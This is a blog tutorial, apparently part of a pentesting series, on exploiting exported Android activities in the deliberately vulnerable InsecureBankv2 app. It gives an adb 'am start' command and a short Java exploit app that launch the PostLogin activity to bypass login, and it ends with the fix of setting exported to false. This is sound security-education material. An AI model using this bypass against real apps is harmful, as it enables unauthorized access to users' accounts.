To all of you those who are expert and have experience in android application developer you already know that There are four vital components in android application which is activities, broadcast receiver, services and content provider. All of these components is considered as IPC mechanism endpoints.
What is IPC mechanism ?
Okay lets take step back for a little, We all know that all android applications is run on DVM(Dalvik Virtual Machine). DVM enforce a technology what is called sandbox in order for another application cannot interfere which other. This could be see when you playing game and experienced crash in your application with various reasons or one of the reasons may be because your phone is suck :p. But after you app game is crash is not affected with the other applications.
That is really cool and enforce security but what if .... another application want to interact with another applications for the sake of the functionality ? well you guess it ! the developer could use IPC mechanism.
so to conclude we could define IPC mechanism as follow:
IPC (inter-process communication) describes the mechanism how different types of android components are communicated.
(i copy paste it from stackoverflow).
But IPC endpoints are often overlooked as potential attack vectors. As both data sources and sinks, interacting with them is highly dependent on their implementation; and their abuse case dependent on their purpose
(i copy paste it again ╭∩╮(-_-)╭∩╮ from android hackers handbook)
(i copy paste it from stackoverflow).
But IPC endpoints are often overlooked as potential attack vectors. As both data sources and sinks, interacting with them is highly dependent on their implementation; and their abuse case dependent on their purpose
(i copy paste it again ╭∩╮(-_-)╭∩╮ from android hackers handbook)
Today we are going to talk about activities in android application and it's security measurement that every developer should know in order to protect their application. Before we get started, here is one of the fun fact for activities that you should know:
In example, activities is one of the component when you try try to touch one of the button in the application and you suddenly move to another class of the application.
Activities is the only component that only facing to user, every UI that you see in android application is an activity component.
For the sake of the implementation i use insecurebank v2 application, it contain many vulnerabilities that could be found in modern android application that will help you understand exploit it.
link: https://github.com/dineshshetty/Android-InsecureBankv2
ok so you done set up and ready to go ?
1. start with reverse engineer the application to get the actual source code of the file. You can do this with apktool or androguard from my previous post.
with apktool:
in order to get an overview of the application and the related permission go to AndroidManifest.xml(by standard android define all the permissions and applciation components in that file)
as you can see from the highlight xml tag the component "PostLogin" set to be exported this means that the application method could be summon by other application and judging from the name it would let us to bypass the authentication of the application.
with androguard:
same manner also goes to androguard analyze the apk and use "get_android_manifest_axml" function to get the AndroidManifest.xml
it may be little bit hard to read you, for better overview you could dump it and put in the text file using python.
So we know that the application could be called outside of the application, how to test that ?
we will use adb command !
Android Debug Bridge (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.
(i copy paste it from developer.android.com)
to do this of course you have to install the application at your device and after that you have to found the package name in order to call the function.
NOTE: DONT FORGET TO SET UP THE APPLICATION SERVER FIRST, READ THE MANUAL !!!!
use adb command along with grep utility to shorten the result, next task is to call the function.
go to the android device using shell command and put:
~# am start -n com.android.insecurebankv2/.PostLogin
am = activity manager
start = starting the activity (no shit sherlock)
-n = component parameter
com.android.insecurebankv2 = name of the package
/.PostLogin = name of the function
ok kewl we just bypass the authentication login. But to all of you who are skeptical about the implementation you may be notice from the previous picture when we get shell in the android device i got root permissions. that means i can do anything inside the android device and what if the device is not rooted ?
i can assure you the following implementation could be use also inside unrooted device. To demonstrate it i will create another application that will called the PostLogin function outside of he application.
package com.example.root.exploit_activity_insecure;
import android.content.Intent;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
public class MainActivity extends AppCompatActivity implements View.OnClickListener {
private Button called_the_app = null;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
called_the_app = (Button)findViewById(R.id.bypass_login);
called_the_app.setOnClickListener(this);
}
@Override
public void onClick(View view) {
switch(view.getId()){
case R.id.bypass_login:
Intent bypass = new Intent(Intent.ACTION_SEND);
bypass.setClassName("com.android.insecurebankv2","com.android.insecurebankv2.PostLogin");
startActivity(bypass);
}
}
}
the following is the code that i used for exploiting the activities application. the only thing that important piece of code is the Intent object. In order to called another application you need to use "Intent.ACTION_SEND" and set the classname along with the activitiy.
(yea i get it! i'm not developer so i just find a quick and dirty way to do this)
so how to mitigate it, well you just simply change the activities configuration to export="false" simple as pie or you can use another advanced configuration permission (https://developer.android.com/training/permissions/requesting)
so walllaaa you just create exploit by yourself. full code of this could be found in (link: https://github.com/acaciaworld80/100dayofpentesting/blob/master/exploit_activity_insecure(day%202).zip)
link:
https://stackoverflow.com/questions/5740324/what-are-the-ipc-mechanisms-available-in-the-android-os
https://stackoverflow.com/questions/8308666/how-to-force-share-intent-to-open-a-specific-app
https://www.linkedin.com/pulse/hacking-android-apps-through-exposed-components-tal-melamed/
https://developer.android.com/studio/command-line/adb
Comments
Post a Comment